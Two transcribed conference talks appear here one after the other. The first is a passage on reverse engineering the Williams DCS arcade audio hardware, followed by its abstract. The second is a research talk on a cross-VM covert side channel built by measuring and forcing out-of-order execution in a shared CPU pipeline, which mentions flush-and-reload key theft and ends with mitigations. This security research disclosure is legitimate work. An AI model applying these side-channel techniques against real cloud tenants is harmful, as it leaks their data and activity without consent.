sample. This is actually composed music where it was done in a studio, the mix was done right, then the master was then encoded. Like, it was done like modern music composition, basically. It's not a sequencer telling you drum hit, drum hit, bass note type thing. It was actually like composed as a complete track. So, and then the final kind of era is modern PC. Like most arcade hardware nowadays is just x86 based. And it just has middleware libraries to do wave, org, mp3, etc. So... Alright, so how DCS works, what are the fundamentals, what is it doing? So you have an uncompressed wave file or whatever source from a dat tape or whatever they would have been using in the 90s. Encoded offline on a PC, so lots of the heavy lifting and the logic is all done in the encoder because the decoder is still complicated, but it doesn't need to do nearly what the encoder needs to do. The audio files are broken down into frames of 240 samples and each frame is 7.68 milliseconds of audio. So that's a good compromise because it allows them, if you had a really short sound you could get really tight with how, where you wanted the DSP engine to slice it for looping and, and yeah, just having tight control over starting to start up the sound. So the sounds can range from one to several thousand frames of the 7.68 milliseconds of audio. Each frame is transformed from time domain to frequency domain by 256 point FFT. So it uses a simple cosine window with eight samples of overlap on each end and that's simply to, to avoid audio artifacts like glitching sounds. So the result, and then this resulting spectrum that you get is broken down into 16 subbands and then quantized according to masking curves and user control parameters. So masking curves are curves that the audio engineers would tune to say basically I know if there's going to be a strong note at this frequency it's going to hide the notes underneath it so we don't need any notes underneath there can be discarded effectively. And then so these quantizing levels and the resulting audio data for each frame are entropy encoded into variable length packets and then these packets for each audio file are combined with header, header blocks denoting the beginning of each frame and each sound and those are stored as, stored as files that can be burnt into the raw EEPROM images. So it's architecturally very similar to MPEG 1 layer 1 and layer 2 so MP1 and MP2 which is like Sony Sdds which is an A-track which is like mini-disk. There is a Phillips digital compact cassette which was an actual cassette tape that had digital encoding instead of analog. Whereas MP3 is more complicated so it's kind of, it's in the MP1, MP2 range. It's got roughly a 10 to 1 compression ratio so that's actually pretty good for 1991 considering everyone else was just really doing those 4-bit or 8-bit sampling short samples on those sample IC chips. Now my comment would be after looking at all this I think it would be very difficult to make an encoder so if you wanted to make your own sounds for your old MK boards or pinballs or whatever you wanted due to the missing masking curve logic, the entropy coding logic and the quantizer behavior that was in the encoder in that PC software so you could do it probably but I would imagine the audio quality would be likely poor because you'd be stacking a bunch of hunches and guesses of what you thought, how you thought the encoder worked on top of each other and it would probably come out terrible as my guess. So here's the overall block diagram of what the DCS architecture looks like. So you've got the actual game CPU slash GPU which has got a bi-directional IO channel to the DSP. The DSP can access the sound ROMs which contain program code and the actual audio data and then it's got a connection to external SRAM just because the DSP itself had very limited on-chip RAM. Then the DSP uses a serial connection to the DAC and then the DAC has voltage output to an op-amp which does low-pass filtering and pre-amp. Then that goes to a 20 watt audio amp which goes to a mono speaker for the earlier mono revision. So here's a little bit of the actual details but it's a TITMS 34000 series, regular 1 meg EEPROM and ADSP 2100 family DSP, 3 8K SRAMs and then an AD1851 16-bit serial audio DAC. So don't worry about all the words on here. This is kind of just the first page of the datasheet for the DSP. Some kind of interesting things to note are there's for this, this is the 2105 and there's no on-chip ROM, E-squared, flash or cache. It pretty much boots from RAM either, sorry, not internally, externally and or from external ROM, whatever's mapped into the address space because it hangs all its address lines out externally and just goes from there. So kind of some of the weird stuff about DSPs, it's 24-bit program data bus, 16-bit data bus because it's Harvard so it's got code and data separate buses. 40-bit multiply and accumulate unit which is 16 bits, 16 bits and 8. 32-bit barrel shifter and it's got a data address generator which can generate modular like circular addressing so you can easily create circular buffers and hardware and it can also do bit reversal. So you have, let's say you have 11000, it will generate 0011, the reverse of that which is used for a lot of DSP algorithms like even in the FFT. And other than that, this particular implementation is clocked with a 10 MHz crystal and I think that's all the relevant stuff there. So here's what the program memory map looks like. The first chunk can be mapped in from external boot memory. So that's the internal program RAM. There is a chunk further up that's external program RAM and that region is shared with the data RAM bus. And then I've noticed that the DCS code just really doesn't map too much code, it doesn't map anything beyond this one FFF address so the rest is unused. And then the data memory map is, so the DSP has a bunch of different chunks with different weight states that can be configurable based on how slow or faster the needs of the type of external memory you hook to which is common. And so nothing terribly crazy here, it maps in those three external SRAMs. There is a 1,000 hex 1,000 word bank window, so that's a 1,000 hex word into the physical sound EPROMs and then you use the bank select register underneath to actually map in the next 1,000 words. And there's the TMS CPU IOLATCH that is used to receive sound commands from the game. There's CPU saying play this grunt, play this scream, play this knife sound, play this background music, stop, loop, whatever. And then the DSP's got its own internal RAM near the end followed by some system registers. Now this, yeah, probably won't go through all this, but this is just kind of a map of all the kind of interesting areas that the code itself uses for its own constants and things like that. Yeah, the DAC play out buffer, we'll cover that later. And when the TMS CPU, the game CPU writes to that IOLATCH, it will fire IRQ2 on the DSP, and that's how the DSP knows there's a new command waiting. So here's kind of my hybrid diagram showing how the DSP actually clocks the audio data, the time domain, digital audio data out to the DAC. And so it's pretty much serial clock, transmit frame sync, which is connected to the latch, I think it's the latch enable pin, which actually the DAC is double buffered, so it takes the shift register and transfers it over to the parallel register once on that LE signal, the data pin, and then there's just the crystal in there. And kind of tribute a note is the DAC clock is running at 500 kHz, so 500 kHz divided by 16-bit samples gives you 32 kHz sampling rate. So this thing is running at three-quarters CD quality basically. And then the output of the DAC goes to the preamp from pin 9. So the sound drums themselves, like I said, they contain the code and the actual compressed audio. There's no encryption or obfuscation in this era. You can pretty much remove them from PCB and dump with a parallel EEPROM programmer like your Willem, Zeltac, or your own design, whatever you want. Nothing too crazy there. So the Wolf series of hardware from Williams, which is what MK3 runs on, uses four of these one megabit by eight bits, so it comes out to be one megabyte UVE problems, so four of them would give you four megs total, as you can see from here. And with a 10-to-one compression, it would yield basically 40 megs of uncompressed audio, which is pretty good for 91 basically. And so the organization of the sound ROMs, the bootloader, which is, there's a Stage 1 and 2 code, the rest of the running program code, and miscellaneous data sits in the U2 ROM, and I'll cover that in the next slide. At these offsets, followed by compression dictionaries, which are basically the Huffman tables used to actually decode the variable length data from the stream. Lookup table entries, which are actually where the DSP first goes when it's commanded to play a sound, it needs to get a first pointer, and there's a lookup table of pointers, and then followed by sound headers. So that first tuple or pointer points to the sound header, sound header points to the frame header, because remember a frame is 7.68 milliseconds of audio, and then finally other stuff in these E-Proms are the actual compressed audio itself. So later games, as I said, use IDE hard drives, and they copy the code and relevant data to DRAM. So I don't know what the partitioning or file system of the hard drives looks like, all I've been looking at is the physical ROMs. So here's the U2, which is the first sound ROM. So it's, like I said, it's got all those data at these various locations, but it's pretty much all that stuff in the first one, and then right near the end is where you get the frame headers and the compressed audio, and all the following ROMs will just be compressed audio with more frames, frames, frame, frame, frame of audio. All the code and stuff stays in the first one, and all the audio itself goes in the other three ROMs, for example, four, five, how many the game has. So the important thing here to note is that the DSP looks up a pointer at hex 4040, which contains the value 4048, then it takes the sound command from the CPU, multiplies it by three, and then adds it to this 4048, and then that gets you the position in this ROM of the lookup table entry, which itself is a three byte value pointing you somewhere down to the sound header section. So as I said, the other three ROMs are just audio, pretty much. And the bank switching, like I said, there's a thousand, a hex 1000 word bank window, and writing to the data memory bus in location 3000 will map in a different bank. So the upper eight bits of that 16-bit word are modulo 4 values, so 0123, and then if you go like 4567, it's equivalent of 0123 ad nauseum, and those select 0123, selects U2, U3, U4, and U5 ROM, respectively. And then the lower eight bits of that word selects what offset to go to in the actual ROM. So here's a few examples here, just showing you that one in the upper eight bits goes to U3, two goes to U4, three goes to U5, and then the last two digits basically map in the offset in that physical ROM. So quickly speed through some of these. This is just a quick history. This is the very first, this is the T unit is the board on the left, and it typically came with everything except more MK2, came with Yamaha FM synthesis chip, whereas MK2, since they had a modular ribbon cable design, they just designed a new board with, there's the DSP sitting right in the middle, and now they bolted on basically streaming compressed audio to the existing motherboard. And this is just a close up of that board on the DSP board on the right. So there's the 2105, 3S RAMs, the actual sound ROMs, and there's more of them in MK2 than in MK3, but that's likely just because they're smaller E-Proms than the ones used in the later games. And a giant heatsink for the 20 watt power amp. Going to the speaker. So here's the Wolf unit, which was MK3, OpenICE, MBA Maximum Hangtime, WWF WrestleMania, a few other games. So there's the four sound ROMs up in the upper left corner. The DSP is kind of to the right of it. There's three more 3S RAMs over there. And then in the upper right corner is the DAC, the preamp, and then the giant heatsink in the upper right is the audio amp. So just a closer view, closer view of the DSP in the 10 megahertz crystal, and just a closer view of the DAC and the audio amp section. Here's Killer Instinct, which shipped with a hard drive for the graphics and animations and transitions, but curiously the sound in this game was still on the eight yellow-stickered E-Proms in the bottom corner. So, oh yeah, the DSP is right in the middle here. And same thing, three 3S RAMs. This is a later Seattle board for NFL Blitz 2000, for example, where it shipped on a hard drive. So there's no sound ROMs anymore. It's completely whatever the file system is. And these later systems were backed with DRAM instead of SRAM, and I guess we'd transfer from the drive to DRAM, and then the DSP would run everything out of RAM. And here's a World Cup Soccer pinball. Williams made a different spin of the board. It looks similar to the MK2 board, but it's not quite the same. Same deal, DSP, the sound ROMs up at the top. I don't know what the second heatsunk chip is there. So basically, with this DCS system design, kind of the parameters or the attributes about it, and this could hold true with almost any audio compression system. What do you want to attain with your design? So, with DCS, early versions were mono, then stereo, then multi-channel, in terms of surround sound style. The polyphony of voices was six, I think all the way from the beginning, at least in the MK3 stuff I was looking at, it's six. So it can play six. It can keep track of six sounds at the same time. So a music track, a voiceover, a couple hits at the same time, whatever else. And then it downmixes all that to mono, for example, and then puts it out the one speaker. Sample rate, 32 kilohertz, 16 bit. The FFT is done in hardware, 16 subbands, 16 buckets basically. The quantization is variable number of bits based on the subband, so it can change how many bits it wants to put into each frequency bucket, based on if it's high frequency and you're not going to hear it, it may allocate zero bits. So the entropy encoding, in this case I think it's Huffman coding, or if you want to extract that to the more general case prefix coding. So that's basically where you'll have values in RAM. The upper byte is a length, and the lower byte is the actual value. So the length basically tells the decoding code to move to advance the bitstream that much length, and then start looking for the next code word in the data stream, the next symbol. Bitstream generation, this is where, so basically there was those lookup table entries, those three byte lookup table entries pointed to sound headers. Those sound headers point to frame headers, and then the frame header includes how many, the first frame header includes how many frames to follow, and then it contains these subband quantization values, which is based effectively like how many bits each bucket should get, and how many subbands are actually in this frame, because if it doesn't need all 16, it won't use them. Then followed by the actual compressed audio data. And then finally the ROM image creation, so this contains the DSP bootloader init code, program code, it's got those compression code word to symbol mapping dictionaries as well as the compressed audio itself, and then this data is split into images and then burnt into the actual e-promes. So a quick compression background based on the subbands and quantization I was talking about. So again, the FFTs use to convert the time domain samples, so that's your amplitude on your Winamp visualization to frequency domain, which is the kind of the equalizer style bar depicting each frequency bucket. The subband coding, like I said, is used to distribute bits based on the frequency bins. High frequency is less perceivable, so you need less bits. And then finally the last step is a lossless entropy coding Huffman, where it's doing those Huffman table lookups, is used to pack those samples into a variable length data stream. And this graph just kind of shows you the different kinds of compression technologies. In this case it's using Huffman for some aspects, it's using subband frequency domain, and it's also using Fourier transform. So basically by identifying what can and can't be heard, audio compression discards, basically it's chucking information that can't be perceived by the human ear. So if you know that signals are below a particular amplitude at a particular frequency that they're not audible, you can hide that quantization noise from your brain. And a tone at a certain frequency, like if it's loud enough, will raise the threshold in a critical frequency band around that frequency. And I'll show you this next slide. And then this masking effect, temporal masking, is the masking occurs when a sound raises the audibility threshold for a brief interval proceeding and following the sound. So it kind of fools your brain that you, or you won't hear the stuff nearby it, that's quieter. And this is all in comparison to traditional lossless methods like zip or RAR, which don't discard data at any stage of the game, because obviously you don't want to unzip a file, and it's completely mangled from what you zipped in the first place. So they have good integrity, but they won't compress obviously as small. So here's kind of the masking effect where a really distinct, intense sound will, will basically raise the threshold, and then you, anything under this dashed line you won't hear, so you can basically start tossing these masked tones or frequency components without affecting, the brain won't notice it too much basically. So this is my take on the DCS encoder. You basically have the uncompressed audio samples coming in, 32-kilometer, 16-bit. It does the frequency mapping transfer, FFT transformation. Then that goes into the quantization and subband block, and this is fed by the perceptual model. So this is what's missing in terms of you trying to make an encoder so you can make your own sounds. You don't know what their masking curve logic is and how they generated their Huffman tables and stuff like that. So that was all done not in real time on a 486 class machine back in the day, but it would take hours to generate the encoded, the compressed files, whereas the DSP had to do it in real time, so there's way more work involved in the encoder obviously. And then so that goes to the bitstream generation, which gives you your variable length bitstream. It's basically the reverse of the other direction. You read in the bitstream, use your compression dictionary to start pulling the quantization values and the actual audio itself samples out, and then you transform them from frequency domain back into time domain with inverse FFT. So there's just a quick screenshot. It's probably hard to see of my life for the last several weeks, which is the amazing built-in debugger in the debug build of MAME. Because once you have the sound rom, the data off the physical sound ROMs, I don't think this project would have happened if I had to write my own ADSP 2100 disassembler and TI, TMS, disassembler and whatever. It was like it was too many layers of overwhelming. So I just used this and it's pretty cool. You've got your program memory bus, 24-bit over here. You've got your 16-bit data RAM values up here, and then you can see the 40-bit multiply and accumulate unit over here and the 32-bit shifter. I think I already mentioned, but I do believe IDA has support for the later versions of the DSP family, but I haven't played with it. So the quick summary of this slide is the DSP boot and initialization process. Effectively, this thing goes through a couple stages before it actually starts running, and it's doing things like installing IRQ handlers, enabling the IRQ that responds when the game CPU talks to the DSP, clears internal RAM, replaces the reset vector and then issues itself a soft reboot. And then at that point, it comes up again in stage two, moves some more areas of memory around, wipes the buffers that get played out to the DAC, which with the actual uncompressed audio, wipes more memory, configures the serial port hardware going to the DAC. So this is effectively the main code loop for the DSP code. This is what it's spending 99% of its life doing. It will sit there processing pending TMS sound commands, so that's from the game CPU. It'll do some quick sanity checking, and then it'll calculate that base pointer, that 4048 plus three times the sound command, which will allow it to index the EEPROM and find where the rest of the sound data is located, basically. Then it parses that sound header more fully and the frame header. Then it decompresses the frame into a block of data memory. So that's simply undoing the, it's entropy decoding the data. And this is, these two last two processes are per channel, because remember, or per voice, sorry with the confusing terminology, but per voice, like it can place six things, it can keep track of six sounds at the same time. So it's doing these processes in a loop before it moves on for each channel or each voice. And then finally it does the IFFT, so it converts that frequency data back to time data, scales it down, because when you do an IFFT, the samples get louder, basically. That's just the nature of running the process. You've got to scale them back down. You apply that windowing and overlap data functions to smooth the data out between frames so you don't get audible glitches. And then you actually fill the DAC buffers, which eventually get clocked out to the DACs, and the DAC turns them into voltages, which we can hear through the speaker. And then finally, it does one last loop to calculate the per channel gains, like the volume gains, and respond back to the TMS. It is bi-directional, although the overwhelming enjoyment of the time, it's not sending any data back to the game CPU. In this case, all these memory locations in the brackets beside them, these are referencing Ultimate Mortal Kombat 3 code. I apologize, I didn't include the actual revision of the game, which version it is, but it's whatever the most popular one was. So, doing kind of a deeper dive into those commands, the first step, processing the commands, wipes the contents of RAM, checks if any new commands have come in and stores them into this circular buffer. IRQ2 fires when, as I said, when the game CPU talks to the DSP. Handler validates the command, makes sure it's not anomalous, stores it in the buffer. And just for trivia, the TMS's address at this location is mapped to the DSP. So, if you're ever looking at the game code on the GPU CPU, this is its address of where it sends, and then that pops out on the other end in the DSP. So, yeah, and it basically finds and stores the pointer to the valid sound header by walking those trail of pointers in ROM, and then it checks for more pending sound commands, because this thing can handle several sound commands at the same time, if they all come in one after another. So, the next stage is finding and parsing the sound and frame headers. So, like I said, it does that three times the sound command from the CPU, goes in ROM at this location, finds this value, this 18183, then walks to 18183, which is the sound header, and you get this string of bytes here. The interesting stuff is in red is the pointer to the frame header, which it has to walk, and then this 0147, which is hex 147 frames in this sound to follow, or the sound is comprised of that many frames. And so, the sound header itself, once it walks to 104.754, which is the U3 ROM and this offset, all these strings of orange are basically, the important point is the number of these orange bytes, not necessarily what contents there are, that tells you how many subband values are in this frame out of a possible 16 frequency subbands, and if it's 7f or ff bytes, it means stop parsing this frame, we're done with the subbands. So, after this in the frame header, once you've looked up the frame header, you'll have the subband decontization values per each subband compressed, and then finally the compressed audio data itself comes after those subbands. So, the remaining frames after that frame header consist of decontization values and compressed audio, there's no more headers. And yeah, then you're decompressing the frame at that point, you're entropy decoding it. Yeah, a lot of these are the specific locations for reference, but yeah, and then you finally jump to this location, which just wipes some counters and proceeds to, is ready to handle another sound if it needs to. So, effectively what's happening is it's actually accumulating all the frequency domain samples for all six channels at the same instance. So, what you'll get is you'll have like music, scream, and scorpions, harpoon. Those values will all be accumulated on top of each other, and eventually they'll have to be scaled down because it does all of its mixing in the frequency domain basically, and then per subband below, so per frequency bucket. So, it's kind of an interesting way of doing it. Then finally you do, they're almost done, you do the inverse FFT. The first couple of iterations are unrolled in their code, and that's where that bit reversed addressing is used for accessing the FFT's twiddle factors are called in scrambled order. This is all standard FFT, nothing fancy, nothing secret they're doing, and then it's got to scale those samples down because that effect of doing the IFFT makes them too loud. So, yeah, there's just a graph, got to keep moving. This is just what it looks like in memory once you do the IFFT. Then the code waits for the serial port to finish clocking out the existing sample buffer, and copies the new samples in, keeps to the standby buffer, which it'll switch to eventually and start clocking those out, keeps 16 samples for overlap, and then when it's time, the serial port treats that standby buffer as the active and starts clocking out, so it's just a continual fill, empty, fill, empty cycle. And if there's no sound requested by the CPU, basically the DSP will calculate a bunch of IFFT, it'll run the IFFT on zeros, copies those zeros to the buffer, and then clocks those out, so it's just continually running even if a sound isn't requested. So here's what the frequency domain data looks like if it's graphed, which is garbage looking. Here's what the time domain, so this is an actual decent looking waveform. Here's your leftover 16 samples that it keeps for the next frame's overlap, and then here's the smoothing cosine window. And then the last step is it just calculated the gains and then responded back to the CPU, like I said, if it needed to. So yeah, that can trigger pinball lighting, mechanical flippers, things like that. So conclusion, basically using a low-cost DSP allowed high efficiency, good quality audio compression algorithm to be accelerated in hardware. It provided roughly a 10 to 1 compression ratio, so the game audio could still be squeezed into eProms instead of having to think about CD-ROMs or hard drives, but they eventually did go to hard drives. Competing systems were using FM synthesis and low-quality short playback didn't sound that good. And then the DCS system basically allowed the musician the freedom to compose, like they're in a traditional studio, they could use whatever instruments, anything they wanted, because it was just compressed audio at that point. So I think I'm out of time, but I just had some sample clips from Street Fighter and MK3. Do we have any time? We're out of time? Okay, so that is everything, and thank you everyone for sticking around.
|
For a decade from the early 90's to the early 2000's, Williams' Digital Compression System (DCS) audio hardware reigned supreme in arcades and casinos, providing amazing sounding music, voice-overs, and effects, blowing competing systems out of the water. This talk will reverse the DSP hardware, firmware, and algorithms powering the DCS audio compression system, used on Midway coin-ops and Williams/Bally pinballs, like Mortal Kombat II/3/4, Killer Instinct 1/2, Cruis'n USA, and Indiana Jones, among others. A tool called DeDCS will be presented, which can extract, decompress, and convert the proprietary compressed audio data from a DCS game's sound ROMs into regular WAV format, taking you back to '92, when you tossed that first quarter into MKII, and Shao Kahn laughed in your face...
|
10.5446/32808 (DOI)
|
Cool. All right. My name is Sophia Dantouan. In this past year, my master's research at RPI focused on exploiting out of order execution and using that to try and enable cross VM code execution. So it all begins with the cloud. And everyone here is probably pretty familiar with how the cloud is structured. Just to go over some of the basics, you have a bunch of virtual instances or virtual machines, all resting on shared hardware. And that shared hardware, shared resources, is allocated by the hypervisor up to the different operating systems. And that dynamic allocation happens through time. So it's always changing, which reduces costs for everyone. And that means that everyone's happy. So there are a few problems with how this situation is set up. Well, first of all, your data is stored remotely. And it might not be secure or it might be private. That host that you're sharing your data with might be vulnerable itself or untrustable. And then finally, the one that people often talk about is that your VMs, which are running your processes or your data, it co-located with a bunch of other virtual machines that you don't know who they are or what they're doing. And they're all sharing the same physical resources. So it's this physical co-location, which leads to side-chain vulnerabilities. Again, here's the basic hardware structure of the cloud. You have the hypervisor layer, which is in the middle, and it's taking that shared physical layer and dynamically allocating that up to the different operating machines above. So each virtual machine will see its own virtual allocation of that shared hardware. So the universal vulnerabilities with this is in that translation between the physical and the virtual hardware. Because it does happen through time, it's based off of the need of each process or each virtual machine. And this means that one virtual machine can cause contention with another for the same resource. And that basically means that your VMs activities, even if it's just telling someone else that you need physical resource Y, that means that your activities are not paked to someone else on the same hardware. So how can we exploit this? Well, we can use something like in cryptography, a side-channel attack. Is any attack which you can gain information from the surrounding system that's implementing the crypto scheme that you're running or the program that's encrypting something. Now in cloud computing, it's quite similar. It's a hardware-based side channel, which means that the environment, the physical environment surrounding the virtual machines is what's leaking the information. It does mean it's cross-VM, a switch VM, even though it's like a black box to other VMs, they can't query inside of it and they can't directly access anything inside. They can learn about this running environment that that virtual machine is running on. This does mean that the information must be both recordable and also repeatedly recordable. So you have to be able to reliably learn information from that environment and be able to map that to the same known processes or to the same known information with a certain degree of certainty. So you can kind of structure a basic send and receive model out of this, or a basic side channel. So this is hardware agnostic. You have one transmitter which is forcing artifacts. Either it could be knowingly forcing artifacts into the environment or unknowingly forcing artifacts in the environment. And that shared hardware is then being read by the receiver or the adversary to learn information about that one sender. So the different ways this can actually be used, if you just have a receiver or if you're just listening to the benign environment noise, you can do things like leaking what processes are running on other virtual machines or keying the environment in which you're on. So you can create a unique signature from the environment and the environment's average usage of the cache, for instance, and use that to ID that specific server that you're running on in the cloud. And that you could use then to determine what physical resource you're running on. Now on the opposite side of the spectrum, if you're just running a transmitter or if you're just forcing artifacts in the shared hardware, you could do something like a denial of service attack where you clog the pipeline or you clog the cache, so other processes that might need it can't. And this can be pretty basic in just forcing someone else out of the cache, but it can actually alter the other execution or the other processes and results. And if you mix these two together, you have something that is more like a communication network. So if someone's forcing patterns in the environment knowingly and someone's receiving those, they can send messages back and forth. And this is what most people think of when they think of side channels. And this is how it would look like. So this is just a simple communication network where you have several virtual machines forcing artifacts in that shared hardware medium, and one VM is then reading those artifacts from the medium and averaging them out to create meaning from them. Just to bring this into a more concrete example, in the cache, there's an attack called a flush and reload attack, and it's targeting the L3 cache tier. The receiver or the adversary, which is listening to the environment, flushes a pre-greed line of L3 cache and then queries it later on for information. And the victim VM, the one that's also using the shared resource, is accessing that same shared line of L3 cache. And in this case, it was doing crypto basically, and accessing that same shared line of L3 cache with its private key. And the adversary was able to leak that private key at the end. If you want to read more about this specific attack, it's on my website. You can read it there. But specifically, my research involves attacking the pipeline. So how can we use the pipeline in a similar way that most people use the cache to create side channels? Well, there's a couple benefits of the pipeline versus the cache. The first is quieter. It's much harder to detect that someone's misusing the pipeline as opposed to the cache, simply because the cache is easier to query or interact with. It's also not affected by noise in the system as much. It's not affected by cache misses or other errors that the system may have. In a super noisy environment, much like the cloud, where tons of processes are just operating normally on the same hardware, the pipeline side channel is actually increased or amplified in strength, which is great. So how are we actually doing this? How are we targeting the pipeline? Well, first of all, the attack factor is we want to create a side channel to exploit inherent properties of this hardware medium. So some things that we can be assured of being there. And this means that we have to have some basic requirements to create a side channel. We have to have shared hardware. We have to know we're dynamically allocated that resource, both of which are inherent properties of cloud systems, so that's great. And we have to be co-located with our victim VMs or other collaborating adversaries. And that's something a little harder to determine, but like I said earlier, it is possible. So we're going to assume that going forward. So specifically, we chose to target the processors, the medium, and on the processor, the CPU's pipeline. And the difficulty associated with the pipeline is that we need to query these artifacts or these messages that we're forcing dynamically. So there's no really easy way to query the pipeline for a specific state, because you can't. If you did that, you'd probably be affecting how the pipeline state is. So all we really can know about the pipeline is the instruction set or the instruction order we feed it from our processes in the order of those instructions. And it results from these instruction sets, so we get to know the values that the pipeline can return to us. Which basically means we can use out-of-order execution. And that's the artifact that we're going to be forcing, and then also recording from the pipeline to learn the state of the pipeline as well as to learn about other processes sharing the pipeline with us. This is how it's going to look. So we have a bunch of VMs all running on the shared processor. And like you can see here, the processes are all sharing between two cores. And so this does assume that SMT is turned on, but in most modern systems, that's the case. So it's not a big deal. And then finally, one interesting thought here is that your instructions, especially in the cloud on shared hardware, are all being executed together with instructions from other processes from foreign VMs that you know nothing about. They're all just being processed in the pipeline in one big pool, as if they were all from one big program, which is kind of scary, because it's supposed to be separate. So how are we going to receive out-of-order executions from the pipeline? Well, like all good presentations, we have a picture of the Intel manual. This picture is basically just showing us that we can get a case on the pipeline that is out-of-order execution. So we can get results from the pipeline that are not expected. And that's what we can record. And this is what it looks like specifically in our receiver. So we have two threads, thread one and two, and they're both storing a value to a specific spot memory and then loading from memory. Now, the key thing here is that the load is happening from the opposite location in memory. So it's store of one to X, but the load from X to R2 happens in the other thread. So in the perfect world, the synced thread case, you get R1 and R2 equals one. But more often the case than not, your threads aren't going to be synced. So you can also get a case where some of the store, the store and load of one happens before the store and load of the other. And in that case, you could get either R1 or R2 being one and the other zero. And both of these cases are pretty normal, so we're going to ignore them. However, in the final case, in the out-of-order execution case, the loads are actually reordered in front of the stores. And in that scenario, X and Y were preset to zero, we're going to get R2 and R1 equal to zero as well. And that's the out-of-order execution case we can count. And so this is just the pseudocode of our receiver. We're iterating through these two threads thousands and thousands of times in certain timeframes. And when we do this, we can actually get a count of the average number of out-of-order executions received in a specific timeframe. And that's great for us because averages matter. We can take these averages in a specific timeframe and learn what an expected average should be and what an analogous one would be or anomalous one would be. So to transmit or to force patterns in this received average out-of-order execution bitstream that we've now constructed, we have to have the ability to force out-of-order execution averages to increase or decrease. So we're going to actually force the average out-of-order execution count to decrease using memory fences. Now everyone here has probably heard of FUNCE, the x86 instruction. But it prevents memory reordering of any kind, which is great because that's what we want to do. We want to decrease the amount of out-of-order executions. It is more expensive operation, but that's great because it's going to do what we want. So this is what the pipeline would look like. Our transmitter is forcing these memory fences in the same pipeline as the receiver. Now the key thing here is that these MFENSEs are being shoved in in the same timeframes that our receiver is recording in. So that is one key thing to have. But in this scenario, the MFENSE is going to force the pipeline to store the values of x or of 1 to x and of 1 to y before the loads. So these actually should be flipped, but it's going to force the proper ordering of our instructions. So this brings us to the importance of memory models. So there's two different types of memory reordering, compilation time and runtime. Obviously we're focusing on runtime or the out-of-order execution case where the pipeline is dynamically reordering our instructions. And we're also focusing on the usually strong memory model. So x86 architecture, this basically means that for the most case the pipeline is going to handle our instructions safely. It's going to give us the results that are expected or correct. However, it's usually strong, which doesn't mean always. And that does mean that we can get that incorrect case or the R1, R2 equals 0. So we're exploiting this inherent property of pipeline optimization. And there's four different types of memory barriers. So the specific case that we're focusing on is we want to force the store to occur before the load. However, there are four different types. Unfortunately, the store load barrier is the most expensive, so it must be truth most things in life. But to reiterate what we were saying earlier, we want to force out-of-order executions. So we're going to assume SMT's turned on and we're going to use a store load barrier of offense to prevent that out-of-order execution case. So to decrease the average out-of-order executions that we can read from the pipeline in specific time intervals. And so for our victim or our transmitter, we're going to force these patterns and infect the order of stores and loads. And like I said earlier, it's time frame dependent. So now we have both the ability to force out-of-order executions on the pipeline as well as to receive. So now we just have to design the channel. So in our lab, we had a Zen hypervisor just because it is the most popular commercial platform. Xeon processors, shared hardware, specifically four cores and six virtual machines. Obviously SMT was turned on. This is what it would look like. We had our six Windows 7 virtual machines all running noisy operations. And that was just to create similarities between our lab environment and the real world case in which one server might have thousands and thousands of processes on it. All right. Now specifically, if we apply our basic sending and receive model to this, we'd have one VM acting as a sender and one as the receiver. Or in a bi-party communication situation, you'd have one VM having both and the other having both as well. And this, and because our side channel is over the pipeline, these processes, the send and receive, would all have to be assured to be executing on the same pipeline. All right. So to demonstrate this, this is just Windows 7 VM with Zen Center on it so I can connect to my Zen server. And we have our clones here, and they're all just sharing the same amount of hardware, the same space. Oh, and I forgot to say you can follow along if you want. On my website, you can get the send and receiveer Python scripts that I have. These are wrappers around the actual scene assembly code that I use to force and receive out of order executions. However, the Python is great because it helps me easily adjust for the noise in different time frames and things like that during the testing. So in this scenario, we had recon 1 being our receiver. And this is, yeah, so receiver was just, we're going to show it first, just receiving the noise from the system. So we're canceling out the noise from the system, and you can see a bit stream of zero here. So this is just reading from the system, saying there's nothing being forced. I'm going to count these all as zeros, and it's plotting it to a graph, which is part of the Python script. It also sends all the out of order execution averages to a file as well, the Python. And you can see that here. And you can see where the different time frames are, and it looks a little bit more drastic than it actually is. The differences between each time frame's average. However, like I said, each system might have a unique signature, given what different processes are running on it. So you would see different average patterns like that based on what system you're running on. Now to show the communication occurring, our sender is going to force out of order executions in the same time frames that the receiver is sending them. And it's just in this scenario going to send two high bits, and those two high bits are going to trigger something in the receiver. So this is just a simple example to show that it works, but with a little bit of engineering, you could create something a bit more malicious, I guess. So blue screen. All right, so in conclusion, like all good academic papers, we had potential mitigation techniques. But the one that had the most possibility of success was isolating your VMs. So if you have your VMs in separate hardware, then you're definitely not going to be affected by this attack. You could also turn off SMT, and you could also set up a custom hypervisor, which is actually watching to make sure that processes from different virtual machines are not sharing resources at the same time, or if they are separated somehow. However, the downsides to all of this are some of the cloud benefits that you do get from sharing. So in conclusion, our contribution was the largest part of it was creating a novel side channel over the pipeline, even though the cache is a bit more popular, and the pipeline harder to query the state of, it is possible. And we show this dynamic method, and we show the application of this in the cloud, as well as some potential mitigation techniques. So I'd like to acknowledge Jeremy Blackthorne from MIT Lincoln Lab for introducing me to this topic, as well as RPI Second Trail of Bits. If there's any questions, you can reach me at IRC, email me, or if you're really adventurous, you can read my thesis. It's on my website. It's all 120 pages of it. So good luck. Or any questions now I can take? Hey, hey, hey. Somebody's got a question. Hang on. Just real quick. What do you define as a noisy environment? When I say noise, I'm basically saying that there's processes or activity in the system that's creating a load in the resource that you're targeting. So like in the case of the cache, you'd have a bunch of other processes shoving values in the cache or using the cache for something. So when you say you simulated a noisy environment, you just had stuff going on. Nothing is particular, right? Yeah, that's what I meant. It's going to be completely different depending on every system you're on, right? Exactly. That's the point. So you want to create an environment with enough processes to create some sort of entropy in the signals that you're reading, just so you know that your noise cancelling algorithms are working or your receiver is not too delicate and things like that. So how can you characterize a normal level of noise? One of these specifics of the environment, so what I did for this case was you just basically take thousands and thousands of recordings from your system and average those together. Have you tried that on, say, EC2 or? We're trying that now, actually. So, I mean, the key thing is that you have to know that you're co-located if you want to do some sort of send receive model. However, you can just download my scripts now and run it on EC2 and record the levels of noise from the systems. You can create a unique signature for that box that you're running on. And based on what noise algorithms and averages you're doing, it would alter the granularity of that signature. However, you could do that right now. And the stability of the patterns that you were observing, again, is there a way to characterize that? The stability of it? So, let's say, did you see any specific pattern for any specific system or processor? Oh, I see. Well, like I said, you can either take systems readings that are unique to that box that you're running on. Or I did see patterns associated with different processes. So, I tested it. Like, you can read this on my thesis. I did a bunch of different attacks. But, in for instance, I tested it on Chrome. So, I would have, like, YouTube open running a bunch of things in 1VM. And you'd actually get a unique signature from that. You wouldn't be able to see what YouTube video they were watching, but you could see that 